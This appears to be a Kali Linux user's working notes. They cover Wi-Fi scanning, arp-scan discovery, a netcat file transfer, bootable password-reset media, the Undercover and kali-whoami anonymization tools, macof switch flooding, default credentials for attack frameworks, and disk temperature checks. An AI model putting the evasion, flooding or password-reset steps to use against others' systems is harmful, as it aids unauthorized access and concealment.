"^[z" execute-last-named-cmd "^[|" vi-goto-column "^[~" _bash_complete-word "^[^?" backward-kill-word "^_" undo " " magic-space "!"-"~" self-insert "^?" backward-delete-char "\M-^@"-"\M-^?" self-insert
Dump the contents of file in a directory
#!/bin/bash # NOTE : Quote it else use array to avoid problems # FILES="/path/to/*" for f in $FILES do echo "Processing $f file..." # take action on each file. $f store current file name cat "$f" done
#!/bin/bash # NOTE : Quote it else use array to avoid problems # FILES="/home/parth/Hacking/Password.Cracking/passwords/*" for f in $FILES do echo "Processing $f file..." # take action on each file. $f store current file name cat "$f" done
7z is a great compression utility.
Ref. https://www.tecmint.com/7zip-command-examples-in-linux/
Info about the AP you are connected to; $ sudo iw dev wlan0 station dump Station 88:dc:96:47:d0:af (on wlan0) inactive time: 15316 ms rx bytes: 8003973 rx packets: 13242 tx bytes: 915627 tx packets: 5792 tx retries: 607 tx failed: 0 beacon loss: 0 beacon rx: 4435 rx drop misc: 3 signal: -56 [-58, -56] dBm signal avg: -55 dBm beacon signal avg: -51 dBm tx bitrate: 90.0 MBit/s MCS 10 40MHz short GI tx duration: 0 us rx bitrate: 300.0 MBit/s MCS 15 40MHz short GI rx duration: 0 us authorized: yes authenticated: yes associated: yes preamble: long WMM/WME: yes MFP: no TDLS peer: no DTIM period: 1 beacon interval:100 short slot time:yes connected time: 455 seconds associated at [boottime]: 3018.726s associated at: 1629476367125 ms current time: 1629476822011 ms -------- $ iw list wiphy index: 0 max # scan SSIDs: 20 max scan IEs length: 365 bytes max # sched scan SSIDs: 20 max # match sets: 8 Retry short limit: 7 Retry long limit: 4 Coverage class: 0 (up to 0m) Device supports RSN-IBSS. Device supports AP-side u-APSD. Device supports T-DLS. Supported Ciphers: * WEP40 (00-0f-ac:1) * WEP104 (00-0f-ac:5) * TKIP (00-0f-ac:2) * CCMP-128 (00-0f-ac:4) * GCMP-128 (00-0f-ac:8) * GCMP-256 (00-0f-ac:9) * CMAC (00-0f-ac:6) * GMAC-128 (00-0f-ac:11) * GMAC-256 (00-0f-ac:12) Available Antennas: TX 0x3 RX 0x3 Configured Antennas: TX 0x3 RX 0x3 Supported interface modes: * IBSS * managed * AP * AP/VLAN * monitor * P2P-client * P2P-GO * P2P-device (A bunch of detailed info omitted for brevity) $ sudo iw wlan0 scan | egrep "^BSS|SSID" BSS 88:dc:96:47:d0:af(on wlan0) -- associated SSID: CCCCPrivate BSS 88:dc:96:49:b3:8e(on wlan0) SSID: CCCC_Tech_Booth BSS 88:dc:96:49:b3:82(on wlan0) SSID: CCCCPrivate BSS 8a:dc:96:49:b3:82(on wlan0) SSID: CCCCPublic BSS 88:dc:96:47:d0:ae(on wlan0) SSID: CCCCPrivate BSS 8a:dc:96:47:d0:ae(on wlan0) SSID: CCCCPublic BSS 88:dc:96:49:b3:88(on wlan0) SSID: CCCCPrivate BSS 8a:dc:96:49:b3:88(on wlan0) SSID: CCCCPublic BSS e8:9f:80:43:55:05(on wlan0) SSID: CCCCPrivate * SSID List BSS ee:9f:80:43:55:05(on wlan0) SSID: * SSID List BSS e8:9f:80:43:55:06(on wlan0) SSID: CCCCPrivate * SSID List BSS 68:39:43:98:7a:9f(on wlan0) SSID: HLD_1987A9F BSS 88:dc:96:49:b3:8f(on wlan0) SSID: CCCC_Tech_Booth BSS 88:dc:96:49:b3:83(on wlan0) SSID: CCCCPrivate BSS 8a:dc:96:49:b3:83(on wlan0) SSID: CCCCPublic -------- $ nmcli -f in-use,ssid,chan,bars,security,bssid dev wifi list IN-USE SSID CHAN BARS SECURITY BSSID CCCC_Tech_Booth 1 ▂▄▆█ WPA2 88:DC:96:49:B3:8E CCCCPrivate 6 ▂▄▆█ WPA2 88:DC:96:49:B3:82 CCCCPrivate 6 ▂▄▆█ WPA2 88:DC:96:47:D0:AE CCCCPublic 6 ▂▄▆█ -- 8A:DC:96:49:B3:82 CCCCPublic 6 ▂▄▆█ -- 8A:DC:96:47:D0:AE CCCC_Tech_Booth 60 ▂▄▆_ WPA2 88:DC:96:49:B3:8F CCCCPrivate 60 ▂▄▆_ WPA2 88:DC:96:49:B3:83 CCCCPublic 60 ▂▄▆_ -- 8A:DC:96:49:B3:83 * CCCCPrivate 44 ▂▄▆_ WPA2 88:DC:96:47:D0:AF HLD_1987A9F 165 ▂▄▆_ WPA1 WPA2 68:39:43:98:7A:9F CCCCPrivate 6 ▂▄__ WPA2 E8:9F:80:43:55:05 -- 6 ▂▄__ WPA2 EE:9F:80:43:55:05 CCCCPrivate 36 ▂___ WPA2 E8:9F:80:43:55:06 CCCCPrivate 6 ▂___ WPA2 88:DC:96:49:B3:88 CCCCPublic 6 ▂___ -- 8A:DC:96:49:B3:88 CCCCPrivate 161 ▂___ WPA2 E8:9F:80:43:55:07
arp-scan As said on this answer you can use arp-scan package. Just arp-scan -l. arp-scan is a command-line tool for system discovery and fingerprinting. It constructs and sends ARP requests to the specified IP addresses, and displays any responses that are received. With systemd/udev names I found very useful an alias to sudo arp-scan -l -t 200 -I $(ls /sys/class/net | grep -o "wl[^\t]\+") for the wireless interface and en instead of wl for wired interfaces. -I --interface Use network interface . If this option is not specified, arp-scan will search the system interface list for the lowest numbered, configured up interface (excluding loopback). -l --localnet Generate addresses from network interface configuration. Use the network interface IP address and network mask to generate the list of target host addresses. -t --timeout Set initial per host timeout to ms, default=100. This timeout is for the first packet sent to each host. To read the arp cache table cool kids nowadays use ip neighbor. A more sophisticated example: sudo arp-scan -l -t 200 -I $(ls /sys/class/net | grep -o "wl[^\t]\+")
Plug in a FAT formatted USB.
Copy the Offline Password Editor files to the USB
┌──(parth㉿parth)-[~/Downloads/syslinux-6.03/bios/mbr] $ ls /media/parth/8258-FD58 boot.msg isolinux.bin ldlinux.c32 readme.txt syslinux.cfg vmlinuz initrd.cgz isolinux.cfg ldlinux.sys scsi.cgz syslinux.exe
Now make the USB bootable
┌──(parth㉿parth)-[~/Downloads/syslinux-6.03/linux] $ cat /proc/partitions major minor #blocks name 259 0 500107608 nvme0n1 259 1 524288 nvme0n1p1 259 2 499712 nvme0n1p2 259 3 499082240 nvme0n1p3 254 0 499065856 dm-0 254 1 498020352 dm-1 254 2 999424 dm-2 8 0 15360000 sda 8 1 15359968 sda1 ┌──(parth㉿parth)-[~/Downloads/syslinux-6.03/bios/linux] $ sudo ./syslinux -i /dev/sda1 [sudo] password for parth: ┌──(parth㉿parth)-[~/Downloads/syslinux-6.03/bios/mbr] $ sudo dd conv=notrunc bs=440 count=1 if=mbr.bin of=/dev/sda 1+0 records in 1+0 records out 440 bytes copied, 0.000151555 s, 2.9 MB/s (Ref: http://wiki.robotz.com/index.php/Creating_bootable_USB_Flash_Drive)
nc (NetCat) can be used for many things. For example, transfering a file from one computer to another over a network.
Identify the file to be transfered. In this case the 'Stuff.To.Process.txt' file in the parth home directory (~).
Note that you need to press Ctrl+C to tear-down the network socket (connection).
$ ls -tor Stuff.To.Process.txt -rw-r--r-- 1 parth 2828 Aug 24 20:11 Stuff.To.Process.txt
Next we start the server that will send the file. Here nc is verbosely (v) listening (l) on port 4096. When a connection is made to port 4096, it will trigger the cat command to respond with the contents of the file.
$ cat Stuff.To.Process.txt | nc -vl 4096 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4096 Ncat: Listening on 0.0.0.0:4096 Ncat: Connection from ::1. Ncat: Connection from ::1:37962.
The client then requests the file. In this case on the same host (network address is the local loopback, 127.0.0.1). When material is returned from the server to this client, the client will redirect (>) that data flow to a file named 'dup.Stuff.To.Process.txt'. Notice that the server is sending from the home directory (~) while the recieving client is in the ~/Scratch/ directory.
You can then press Ctrl+c on either the server or client to tear-down the network socket (session/connection)
┌──(parth㉿parth)-[~/Scratch] $ nc localhost 4096 > dup.Stuff.To.Process.txt ^C
You can compare the file sizes of the original and the duplicated file to see that they are (most likely) identical. To be sure they are identical, use an md5 hashing tool to compare their hashes.
Kali Undercover is a set of scripts that changes the look and feel of your Kali Linux desktop environment to Windows 10 desktop environment, like magic.
The main purpose of introducing Kali Undercover mode is to prevent any unnecessary attention while using Kali Linux in public.
Run 'kali-undercover' to start the process and then again to terminate it.
Ref (https://www.kali.org/docs/introduction/kali-undercover/)
So, what does this use?
Anti MITM Log killer IP changer Dns Changer Mac changer Anti cold boot Timezone changer Hostname changer Browser anonymization
Download from https://github.com/omer-dogan/kali-whoami. Unzip the download into its own directory and cd into it. There run this command;
sudo make install
Now check that the pgm has been compiled and installed.
$ which kali-whoami /usr/bin/kali-whoami $
Also install these
sudo apt update && sudo apt install tar tor curl python3 python3-scapy network-manager
Syntax: sudo bash whoami --start (or bash whoami --start but this is not recommended)
Restores all settings using previously backed up system configurations and whoami completely turns off
sudo bash whoami --stop (or bash whoami --stop but this is not recommended)
This command shows the whoami status and detailed ip address
sudo bash whoami --status (or bash whoami --status but this is not recommended)
Ref (https://www.errorsfind.com/anonymous-on-kali-linux-at-the-highest-level/20/09/)
This will identify the WiFi AP you are associated with.
$ iwgetid wlan0 ESSID:"ATTFJ4Br3A"
macof floods the local network with random MAC addresses (causing some switches to fail open in repeating mode, facilitating sniffing). A straight C port of the original Perl Net::RawIP macof program by Ian Vitek .
Kali changed to a non-root user policy by default since the release of 2020.1.
This means:
Default Tool Credentials
Some tools shipped with Kali, will use their own default hardcoded credentials (others will generate a new password the first time its used). The following tools have the default values:
BeEF-XSS Username: beef Password: beef Configuration File: /etc/beef-xss/config.yaml MySQL User: root Password: (blank) Setup Program: mysql_secure_installation OpenVAS Username: admin Password: Setup Program: openvas-setup Metasploit-Framework Username: postgres Password: postgres Configuration File: /usr/share/metasploit-framework/config/database.yml PowerShell-Empire/Starkiller Username: empireadmin Password: password123
This software can be instlled on Linux and then used at the command line to mount and access an Android file system for file copy or about anything.
I need to look further if I want to mount/access Android like any disk partition.
$ sudo apt install gmtp $ sudo apt install mtp-tools $ mtp-connect $ mtp-folders $ mtp-detect libmtp version: 1.1.18 Listing raw device(s) Device 0 (VID=04e8 and PID=6860) is a Samsung Galaxy models (MTP). Found 1 device(s): Samsung: Galaxy models (MTP) (04e8:6860) @ bus 3, dev 12 Attempting to connect device(s) libusb_claim_interface() reports device is busy, likely in use by GVFS or KDE MTP device handling alreadyLIBMTP PANIC: Unable to initialize device Unable to open raw device 0 OK. $ mtp-folders Completing external command mtp-albumart mtp-emptyfolders mtp-getfile mtp-playlists mtp-tracks mtp-albums mtp-files mtp-getplaylist mtp-reset mtp-trexist mtp-connect mtp-filetree mtp-hotplug mtp-sendfile mtp-delfile mtp-folders mtp-newfolder mtp-sendtr mtp-detect mtp-format mtp-newplaylist mtp-thumb
I need to review this page and see if I can do this... https://askubuntu.com/questions/474669/ssd-temperature-sensor-readout-with-hddtemp $ sudo smartctl /dev/nvme0n1 -a | grep -i Temp Warning Comp. Temp. Threshold: 83 Celsius Critical Comp. Temp. Threshold: 85 Celsius Temperature: 56 Celsius Warning Comp. Temperature Time: 0 Critical Comp. Temperature Time: 0 Temperature Sensor 1: 56 Celsius Temperature Sensor 2: 60 Celsius $ sudo smartctl -a /dev/nvme0n1 smartctl 7.2 2020-12-30 r5155 [x86_64-linux-5.10.0-kali9-amd64] (local build) Copyright (C) 2002-20, Bruce Allen, Christian Franke, www.smartmontools.org === START OF INFORMATION SECTION === Model Number: BC511 NVMe SK hynix 512GB Serial Number: NY12N067711602M15 Firmware Version: 11004101 PCI Vendor/Subsystem ID: 0x1c5c IEEE OUI Identifier: 0xace42e Controller ID: 1 NVMe Version: 1.3 Number of Namespaces: 1 Namespace 1 Size/Capacity: 512,110,190,592 [512 GB] Namespace 1 Formatted LBA Size: 512 Local Time is: Sun Jul 18 12:24:43 2021 EDT Firmware Updates (0x16): 3 Slots, no Reset required Optional Admin Commands (0x0017): Security Format Frmw_DL Self_Test Optional NVM Commands (0x0057): Comp Wr_Unc DS_Mngmt Sav/Sel_Feat Timestmp Log Page Attributes (0x02): Cmd_Eff_Lg Maximum Data Transfer Size: 64 Pages Warning Comp. Temp. Threshold: 83 Celsius Critical Comp. Temp. Threshold: 85 Celsius Namespace 1 Features (0x02): NA_Fields Supported Power States St Op Max Active Idle RL RT WL WT Ent_Lat Ex_Lat 0 + 3.5000W - - 0 0 0 0 5 5 1 + 2.4000W - - 1 1 1 1 30 30 2 + 1.9000W - - 2 2 2 2 100 100 3 - 0.0350W - - 3 3 3 3 1000 1000 4 - 0.0050W - - 3 3 3 3 5000 5000 Supported LBA Sizes (NSID 0x1) Id Fmt Data Metadt Rel_Perf 0 + 512 0 0 1 - 4096 0 0 === START OF SMART DATA SECTION === SMART overall-health self-assessment test result: PASSED SMART/Health Information (NVMe Log 0x02) Critical Warning: 0x00 Temperature: 55 Celsius Available Spare: 100% Available Spare Threshold: 50% Percentage Used: 0% Data Units Read: 1,827,016 [935 GB] Data Units Written: 2,814,285 [1.44 TB] Host Read Commands: 9,840,369 Host Write Commands: 15,067,596 Controller Busy Time: 76 Power Cycles: 129 Power On Hours: 18 Unsafe Shutdowns: 26 Media and Data Integrity Errors: 0 Error Information Log Entries: 0 Warning Comp. Temperature Time: 0 Critical Comp. Temperature Time: 0 Temperature Sensor 1: 55 Celsius Temperature Sensor 2: 60 Celsius Error Information (NVMe Log 0x01, 16 of 256 entries) No Errors Logged https://www.dell.com/community/Inspiron/Inspiron-G5-15-5587-thermals- cooling-fan-control/td-p/6213519/page/2 Dell G5 15 5587 Overheating Issue Hello everyone. I recently purchased a Dell G5 5587 laptop and experiencing overheating issues. I had a bit of surfing on the net(Reddit, Dell Community Forums, Google+) and found out that many people experiencing the same issue. I found a solution to lower the temperatures by undervolting the CPU via Throttlestop and it actually helps. But I still get occasional FPS drops(every 10-15 minutes). It's like a minifreeze followed by a sound crack and it only goes for maybe half a second and everything goes back to normal. Anyone else experiencing the same thing? Is there any other suggestions to eliminate this problem? I turned off the turboboost and the issue has been resolved. However it effects the performance drastically. (Far Cry 5 in-game benchmark result: With turboboost average fps 76, without turboboost average fps 55) So deactivating the turboboost defies the purpose of having a gaming laptop. I am currently using a platform to elevate the computer and it does help with reducing the core temp however this minifreeze issue is still occuring. Also with the new BIOS update (1.9) dell power manager has a new Thermal management feature and I already set it for Ultra Performance. So I am not sure what to do. Thank you in advance. In Thermal Management try setting it to Optimize. When my G5 5587 is set to Optimize with no games running, it stays between 50-55 C. I have not tried any CPU intensive games yet. https://github.com/FlyGoat/RyzenAdj echo $(($(cat /sys/class/thermal/thermal_zone0/temp) / 1000)) echo $(($(cat /sys/class/thermal/thermal_zone1/temp) / 1000)) https://www.pcgamer.com/amd-views-ryzen-5000-cpu-temperatures-up-to-95c-as-typical-and-by-design/ Shell script to control fans https://www.reddit.com/r/Dell/comments/gzens4/dell_g5_15_se_2020_model_5505_controlling_the/ Info about the AP you are connejcted to sudo iw dev wlan0 station dump -------- sudo arp-scan -l -t 200 -I $(ls /sys/class/net | grep -o "wl[^\t]\+") arp-scan As said on this answer you can use arp-scan package. Just arp-scan -l. arp-scan is a command-line tool for system discovery and fingerprinting. It constructs and sends ARP requests to the specified IP addresses, and displays any responses that are received. With systemd/udev names I found very useful an alias to sudo arp-scan -l -t 200 -I $(ls /sys/class/net | grep -o "wl[^\t]\+") for the wireless interface and en instead of wl for wired interfaces. -I --interface Use network interface . If this option is not specified, arp-scan will search the system interface list for the lowest numbered, configured up interface (excluding loopback). -l --localnet Generate addresses from network interface configuration. Use the network interface IP address and network mask to generate the list of target host addresses. -t --timeout Set initial per host timeout to ms, default=100. This timeout is for the first packet sent to each host. To read the arp cache table cool kids nowadays use ip neighbor. -------- $ sudo iw dev wlan0 station dump Station 88:dc:96:47:d0:af (on wlan0) inactive time: 15316 ms rx bytes: 8003973 rx packets: 13242 tx bytes: 915627 tx packets: 5792 tx retries: 607 tx failed: 0 beacon loss: 0 beacon rx: 4435 rx drop misc: 3 signal: -56 [-58, -56] dBm signal avg: -55 dBm beacon signal avg: -51 dBm tx bitrate: 90.0 MBit/s MCS 10 40MHz short GI tx duration: 0 us rx bitrate: 300.0 MBit/s MCS 15 40MHz short GI rx duration: 0 us authorized: yes authenticated: yes associated: yes preamble: long WMM/WME: yes MFP: no TDLS peer: no DTIM period: 1 beacon interval:100 short slot time:yes connected time: 455 seconds associated at [boottime]: 3018.726s associated at: 1629476367125 ms current time: 1629476822011 ms -------- $ iw list Wiphy phy0 wiphy index: 0 max # scan SSIDs: 20 max scan IEs length: 365 bytes max # sched scan SSIDs: 20 max # match sets: 8 Retry short limit: 7 Retry long limit: 4 Coverage class: 0 (up to 0m) Device supports RSN-IBSS. Device supports AP-side u-APSD. Device supports T-DLS. Supported Ciphers: * WEP40 (00-0f-ac:1) * WEP104 (00-0f-ac:5) * TKIP (00-0f-ac:2) * CCMP-128 (00-0f-ac:4) * GCMP-128 (00-0f-ac:8) * GCMP-256 (00-0f-ac:9) * CMAC (00-0f-ac:6) * GMAC-128 (00-0f-ac:11) * GMAC-256 (00-0f-ac:12) Available Antennas: TX 0x3 RX 0x3 Configured Antennas: TX 0x3 RX 0x3 Supported interface modes: * IBSS * managed * AP * AP/VLAN * monitor * P2P-client * P2P-GO * P2P-device Band 1: Capabilities: 0x19ef RX LDPC HT20/HT40 SM Power Save disabled RX HT20 SGI RX HT40 SGI TX STBC RX STBC 1-stream Max AMSDU length: 7935 bytes DSSS/CCK HT40 Maximum RX AMPDU length 65535 bytes (exponent: 0x003) Minimum RX AMPDU time spacing: 4 usec (0x05) HT Max RX data rate: 300 Mbps HT TX/RX MCS rate indexes supported: 0-15 HE Iftypes: Station HE MAC Capabilities (0x78031220abc0): +HTC HE Supported TWT Requester Trigger Frame MAC Padding Duration: 2 Multi-TID Aggregation Support: 7 32-bit BA Bitmap OM Control Maximum A-MPDU Length Exponent: 2 A-MSDU in A-MPDU Multi-TID Aggregation TX: 7 UL 2x996-Tone RU HE PHY Capabilities: (0x0e3f0200fd09800ecff200): HE40/2.4GHz HE40/HE80/5GHz HE160/5GHz Punctured Preamble RX: 15 Device Class: 1 LDPC Coding in Payload NDP with 4x HE-LTF and 3.2us GI SU Beamformee Beamformee STS <= 80Mhz: 7 Beamformee STS > 80Mhz: 7 Sounding Dimensions <= 80Mhz: 1 Sounding Dimensions > 80Mhz: 1 PPE Threshold Present Power Boost Factor ar HE SU PPDU & HE PPDU 4x HE-LTF 0.8us GI Max NC: 1 HE ER SU PPDU 4x HE-LTF 0.8us GI 20MHz in 40MHz HE PPDU 2.4GHz 20MHz in 160/80+80MHz HE PPDU 80MHz in 160/80+80MHz HE PPDU DCM Max BW: 3 Non-Triggered CQI Feedback RX Full BW SU Using HE MU PPDU with Compression SIGB RX Full BW SU Using HE MU PPDU with Non-Compression SIGB HE RX MCS and NSS set <= 80 MHz 1 streams: MCS 0-11 2 streams: MCS 0-11 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported HE TX MCS and NSS set <= 80 MHz 1 streams: MCS 0-11 2 streams: MCS 0-11 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported HE RX MCS and NSS set 160 MHz 1 streams: MCS 0-11 2 streams: MCS 0-11 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported HE TX MCS and NSS set 160 MHz 1 streams: MCS 0-11 2 streams: MCS 0-11 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported PPE Threshold 0x61 0x1c 0xc7 0x71 HE Iftypes: AP HE MAC Capabilities (0x780112080840): +HTC HE Supported Trigger Frame MAC Padding Duration: 2 Multi-TID Aggregation Support: 7 BSR OM Control Maximum A-MPDU Length Exponent: 2 A-MSDU in A-MPDU UL 2x996-Tone RU HE PHY Capabilities: (0x0e200200fd09800ccff000): HE40/2.4GHz HE40/HE80/5GHz HE160/5GHz LDPC Coding in Payload NDP with 4x HE-LTF and 3.2us GI SU Beamformee Beamformee STS <= 80Mhz: 7 Beamformee STS > 80Mhz: 7 Sounding Dimensions <= 80Mhz: 1 Sounding Dimensions > 80Mhz: 1 PPE Threshold Present HE SU PPDU & HE PPDU 4x HE-LTF 0.8us GI Max NC: 1 HE ER SU PPDU 4x HE-LTF 0.8us GI 20MHz in 40MHz HE PPDU 2.4GHz 20MHz in 160/80+80MHz HE PPDU 80MHz in 160/80+80MHz HE PPDU DCM Max BW: 3 RX Full BW SU Using HE MU PPDU with Compression SIGB RX Full BW SU Using HE MU PPDU with Non-Compression SIGB HE RX MCS and NSS set <= 80 MHz 1 streams: MCS 0-11 2 streams: MCS 0-11 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported HE TX MCS and NSS set <= 80 MHz 1 streams: MCS 0-11 2 streams: MCS 0-11 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported HE RX MCS and NSS set 160 MHz 1 streams: MCS 0-11 2 streams: MCS 0-11 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported HE TX MCS and NSS set 160 MHz 1 streams: MCS 0-11 2 streams: MCS 0-11 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported PPE Threshold 0x61 0x1c 0xc7 0x71 Bitrates (non-HT): * 1.0 Mbps * 2.0 Mbps (short preamble supported) * 5.5 Mbps (short preamble supported) * 11.0 Mbps (short preamble supported) * 6.0 Mbps * 9.0 Mbps * 12.0 Mbps * 18.0 Mbps * 24.0 Mbps * 36.0 Mbps * 48.0 Mbps * 54.0 Mbps Frequencies: * 2412 MHz [1] (22.0 dBm) * 2417 MHz [2] (22.0 dBm) * 2422 MHz [3] (22.0 dBm) * 2427 MHz [4] (22.0 dBm) * 2432 MHz [5] (22.0 dBm) * 2437 MHz [6] (22.0 dBm) * 2442 MHz [7] (22.0 dBm) * 2447 MHz [8] (22.0 dBm) * 2452 MHz [9] (22.0 dBm) * 2457 MHz [10] (22.0 dBm) * 2462 MHz [11] (22.0 dBm) * 2467 MHz [12] (22.0 dBm) * 2472 MHz [13] (22.0 dBm) * 2484 MHz [14] (disabled) Band 2: Capabilities: 0x19ef RX LDPC HT20/HT40 SM Power Save disabled RX HT20 SGI RX HT40 SGI TX STBC RX STBC 1-stream Max AMSDU length: 7935 bytes DSSS/CCK HT40 Maximum RX AMPDU length 65535 bytes (exponent: 0x003) Minimum RX AMPDU time spacing: 4 usec (0x05) HT Max RX data rate: 300 Mbps HT TX/RX MCS rate indexes supported: 0-15 VHT Capabilities (0x039071f6): Max MPDU length: 11454 Supported Channel Width: 160 MHz RX LDPC short GI (80 MHz) short GI (160/80+80 MHz) TX STBC SU Beamformee MU Beamformee VHT RX MCS set: 1 streams: MCS 0-9 2 streams: MCS 0-9 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported VHT RX highest supported: 0 Mbps VHT TX MCS set: 1 streams: MCS 0-9 2 streams: MCS 0-9 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported VHT TX highest supported: 0 Mbps HE Iftypes: Station HE MAC Capabilities (0x78031220abc0): +HTC HE Supported TWT Requester Trigger Frame MAC Padding Duration: 2 Multi-TID Aggregation Support: 7 32-bit BA Bitmap OM Control Maximum A-MPDU Length Exponent: 2 A-MSDU in A-MPDU Multi-TID Aggregation TX: 7 UL 2x996-Tone RU HE PHY Capabilities: (0x0e3f0200fd09800ecff200): HE40/2.4GHz HE40/HE80/5GHz HE160/5GHz Punctured Preamble RX: 15 Device Class: 1 LDPC Coding in Payload NDP with 4x HE-LTF and 3.2us GI SU Beamformee Beamformee STS <= 80Mhz: 7 Beamformee STS > 80Mhz: 7 Sounding Dimensions <= 80Mhz: 1 Sounding Dimensions > 80Mhz: 1 PPE Threshold Present Power Boost Factor ar HE SU PPDU & HE PPDU 4x HE-LTF 0.8us GI Max NC: 1 HE ER SU PPDU 4x HE-LTF 0.8us GI 20MHz in 40MHz HE PPDU 2.4GHz 20MHz in 160/80+80MHz HE PPDU 80MHz in 160/80+80MHz HE PPDU DCM Max BW: 3 Non-Triggered CQI Feedback RX Full BW SU Using HE MU PPDU with Compression SIGB RX Full BW SU Using HE MU PPDU with Non-Compression SIGB HE RX MCS and NSS set <= 80 MHz 1 streams: MCS 0-11 2 streams: MCS 0-11 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported HE TX MCS and NSS set <= 80 MHz 1 streams: MCS 0-11 2 streams: MCS 0-11 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported HE RX MCS and NSS set 160 MHz 1 streams: MCS 0-11 2 streams: MCS 0-11 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported HE TX MCS and NSS set 160 MHz 1 streams: MCS 0-11 2 streams: MCS 0-11 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported PPE Threshold 0x61 0x1c 0xc7 0x71 HE Iftypes: AP HE MAC Capabilities (0x780112080840): +HTC HE Supported Trigger Frame MAC Padding Duration: 2 Multi-TID Aggregation Support: 7 BSR OM Control Maximum A-MPDU Length Exponent: 2 A-MSDU in A-MPDU UL 2x996-Tone RU HE PHY Capabilities: (0x0e200200fd09800ccff000): HE40/2.4GHz HE40/HE80/5GHz HE160/5GHz LDPC Coding in Payload NDP with 4x HE-LTF and 3.2us GI SU Beamformee Beamformee STS <= 80Mhz: 7 Beamformee STS > 80Mhz: 7 Sounding Dimensions <= 80Mhz: 1 Sounding Dimensions > 80Mhz: 1 PPE Threshold Present HE SU PPDU & HE PPDU 4x HE-LTF 0.8us GI Max NC: 1 HE ER SU PPDU 4x HE-LTF 0.8us GI 20MHz in 40MHz HE PPDU 2.4GHz 20MHz in 160/80+80MHz HE PPDU 80MHz in 160/80+80MHz HE PPDU DCM Max BW: 3 RX Full BW SU Using HE MU PPDU with Compression SIGB RX Full BW SU Using HE MU PPDU with Non-Compression SIGB HE RX MCS and NSS set <= 80 MHz 1 streams: MCS 0-11 2 streams: MCS 0-11 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported HE TX MCS and NSS set <= 80 MHz 1 streams: MCS 0-11 2 streams: MCS 0-11 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported HE RX MCS and NSS set 160 MHz 1 streams: MCS 0-11 2 streams: MCS 0-11 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported HE TX MCS and NSS set 160 MHz 1 streams: MCS 0-11 2 streams: MCS 0-11 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported PPE Threshold 0x61 0x1c 0xc7 0x71 Bitrates (non-HT): * 6.0 Mbps * 9.0 Mbps * 12.0 Mbps * 18.0 Mbps * 24.0 Mbps * 36.0 Mbps * 48.0 Mbps * 54.0 Mbps Frequencies: * 5180 MHz [36] (22.0 dBm) * 5200 MHz [40] (22.0 dBm) * 5220 MHz [44] (22.0 dBm) * 5240 MHz [48] (22.0 dBm) * 5260 MHz [52] (22.0 dBm) (no IR, radar detection) * 5280 MHz [56] (22.0 dBm) (no IR, radar detection) * 5300 MHz [60] (22.0 dBm) (no IR, radar detection) * 5320 MHz [64] (22.0 dBm) (no IR, radar detection) * 5340 MHz [68] (disabled) * 5360 MHz [72] (disabled) * 5380 MHz [76] (disabled) * 5400 MHz [80] (disabled) * 5420 MHz [84] (disabled) * 5440 MHz [88] (disabled) * 5460 MHz [92] (disabled) * 5480 MHz [96] (disabled) * 5500 MHz [100] (22.0 dBm) (no IR, radar detection) * 5520 MHz [104] (22.0 dBm) (no IR, radar detection) * 5540 MHz [108] (22.0 dBm) (no IR, radar detection) * 5560 MHz [112] (22.0 dBm) (no IR, radar detection) * 5580 MHz [116] (22.0 dBm) (no IR, radar detection) * 5600 MHz [120] (22.0 dBm) (no IR, radar detection) * 5620 MHz [124] (22.0 dBm) (no IR, radar detection) * 5640 MHz [128] (22.0 dBm) (no IR, radar detection) * 5660 MHz [132] (22.0 dBm) (no IR, radar detection) * 5680 MHz [136] (22.0 dBm) (no IR, radar detection) * 5700 MHz [140] (22.0 dBm) (no IR, radar detection) * 5720 MHz [144] (22.0 dBm) (no IR, radar detection) * 5745 MHz [149] (22.0 dBm) * 5765 MHz [153] (22.0 dBm) * 5785 MHz [157] (22.0 dBm) * 5805 MHz [161] (22.0 dBm) * 5825 MHz [165] (22.0 dBm) * 5845 MHz [169] (disabled) * 5865 MHz [173] (disabled) * 5885 MHz [177] (disabled) * 5905 MHz [181] (disabled) Supported commands: * new_interface * set_interface * new_key * start_ap * new_station * new_mpath * set_mesh_config * set_bss * authenticate * associate * deauthenticate * disassociate * join_ibss * join_mesh * remain_on_channel * set_tx_bitrate_mask * frame * frame_wait_cancel * set_wiphy_netns * set_channel * set_wds_peer * tdls_mgmt * tdls_oper * start_sched_scan * probe_client * set_noack_map * register_beacons * start_p2p_device * set_mcast_rate * connect * disconnect * channel_switch * set_qos_map * add_tx_ts * set_multicast_to_unicast WoWLAN support: * wake up on disconnect * wake up on magic packet * wake up on pattern match, up to 20 patterns of 16-128 bytes, maximum packet offset 0 bytes * can do GTK rekeying * wake up on GTK rekey failure * wake up on EAP identity request * wake up on 4-way handshake * wake up on rfkill release * wake up on network detection, up to 8 match sets software interface modes (can always be added): * AP/VLAN * monitor valid interface combinations: * #{ managed } 